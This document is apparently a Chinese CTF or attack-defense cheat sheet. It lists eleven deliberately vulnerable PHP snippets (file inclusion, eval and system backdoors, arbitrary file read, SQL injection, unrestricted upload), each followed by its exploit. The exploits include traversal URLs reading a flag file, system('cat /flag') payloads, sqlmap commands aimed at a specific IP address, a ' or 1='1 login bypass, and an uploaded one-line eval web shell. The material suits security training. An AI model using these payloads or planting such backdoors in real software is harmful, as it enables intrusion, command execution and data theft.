1.文件包含漏洞
源码
<?php
$file=$_GET['file'];
include $file;
?>
漏洞利用
/about.php?file=../flag
2.代码执行漏洞
源码
@eval($_REQUEST['c']);
漏洞利用
/config.php?c=system('cat ../flag');
3.任意文件读取漏洞
源码
<?php
include 'header.php';
$file_path = $_GET['path'];
if(file_exists($file_path)){
$fp = fopen($file_path,"r");
$str = fread($fp,filesize($file_path));
echo $str = str_replace("\r\n","<br />",$str);
}
?>
漏洞利用
/contact.php?path=../flag
4.代码执行漏洞
源码
<?php
$shell=$_POST['shell'];
system($shell);
if($shell !=""){
exit();
}
?>
漏洞利用
ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag
5.代码执行漏洞
源码
<?php
include 'header.php';
@eval($_REQUEST['aa']);
?>
漏洞利用
/index.php?aa=system('cat ../flag');
6.SQL注入漏洞
源码
<?php
include 'header.php';
include_once('config.php');
if (!empty($_GET['id'])) {
$id=$_GET['id'];
$query = "SELECT * FROM news WHERE id=$id";
$data = mysqli_query($dbc,$query);
}
$com = mysqli_fetch_array($data);
?>
漏洞利用
#sqlmap检测
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1
#列出所有数据库
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 --dbs
#列出指定数据库的表
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 -D cyber --tables
7.代码执行漏洞
源码
<?php
$shell=$_POST['shell'];
system($shell);
if($shell !=""){
exit();
}
?>
漏洞利用
ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag
8.万能钥匙
源码
<?php
include_once('config.php');
if (!empty($_POST['username'])) {
$user=$_POST['username'];
$pass=$_POST['password'];
$query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";
$data = mysqli_query($dbc,$query);
if (mysqli_num_rows($data) == 1) {
$row = mysqli_fetch_array($data);
$_SESSION['username'] = $row['user_name'];
header('Location: ./admin/index.php');
}else{
echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
}
}
?>
漏洞利用
' or 1='1
9.信息泄露
源码
<h3>flag:<?php system("cat /flag")?></h3>
10.任意命令执行
源码
<?php
$p=$_GET['p'];
echo $p;
$q=exec($p);
var_dump($q);
?>
漏洞利用
/admin/header.php?p=cat /flag
11.文件上传漏洞
源码
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
if($name!=="")
{
$name1=substr($name,-4);
if(is_uploaded_file($tmpName)){
$time=time();
$rootpath='./upload/'.$time.$name1;
$file=fopen($tmpName, "r") or die('No such file!');
$content=fread($file, filesize($tmpName));
if(strstr($content,'fuck')){
exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
}
if(!move_uploaded_file($tmpName,$rootpath)){
echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
exit;
}
}
echo "上传成功:/upload/".$time.$name1;
}
}
catch(Exception $e)
{
echo "ERROR";
}
漏洞利用
#传入一句话木马1.php
<?php @eval($_REQUEST['c']);?>
/admin/upload/1718338939.php?c=system('cat /flag');